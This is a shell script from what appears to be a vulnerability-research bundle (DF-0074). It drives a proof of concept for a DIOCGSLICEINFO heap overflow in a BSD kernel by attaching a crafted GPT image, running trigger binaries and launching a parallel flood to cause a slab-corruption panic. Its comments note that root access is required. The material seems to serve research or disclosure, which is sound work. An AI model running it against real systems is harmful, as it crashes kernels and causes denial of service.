DF-0074 / run.sh
#!/bin/sh # DF-0074 run script -- triggers the DIOCGSLICEINFO heap overflow and induces # the slab-corruption panic. MUST RUN AS ROOT (devfs grants /dev/vn0* as # root:operator crw-r----- on the default ruleset; an unprivileged user gets # EACCES -- see VERDICT.md "Reachability"). The panic is asynchronous # (slab_cleanup trips after the trigger process exits), so this script may # return before the guest freezes; the proof is in dfbsd-qemu/boot.log. # # Usage (as root on the guest): ./run.sh [vn_device] DEV=${1:-vn0} cd "$(dirname "$0")" echo "=== attaching crafted GPT image (128 entries) to $DEV ===" vnconfig -c "$DEV" ./overflow.img echo "attach rc=$?" ls /dev/${DEV}* 2>&1 | head -20 echo echo "=== single DIOCGSLICEINFO (proves overflow: nslices should be 130) ===" ./trigger /dev/${DEV}s1 echo "trigger rc=$?" echo echo "=== stress: 5 ioctl+fd-churn iters + fork/exit churn (induces panic) ===" ./trigger_stress /dev/${DEV}s1 5 echo "stress rc=$?" echo echo "=== parallel flood (16 procs) to churn slab zones hit by the overrun ===" i=0 while [ $i -lt 16 ]; do ./trigger /dev/${DEV}s1 >/dev/null 2>&1 & i=$((i+1)) done wait echo "flood rc=$?" echo echo "=== if the guest is still up, the async slab_cleanup panic will follow; ===" echo "=== check dfbsd-qemu/boot.log for: 'Fatal trap 12 ... slab_cleanup' ===" vnconfig -u "$DEV" 2>/dev/null || true |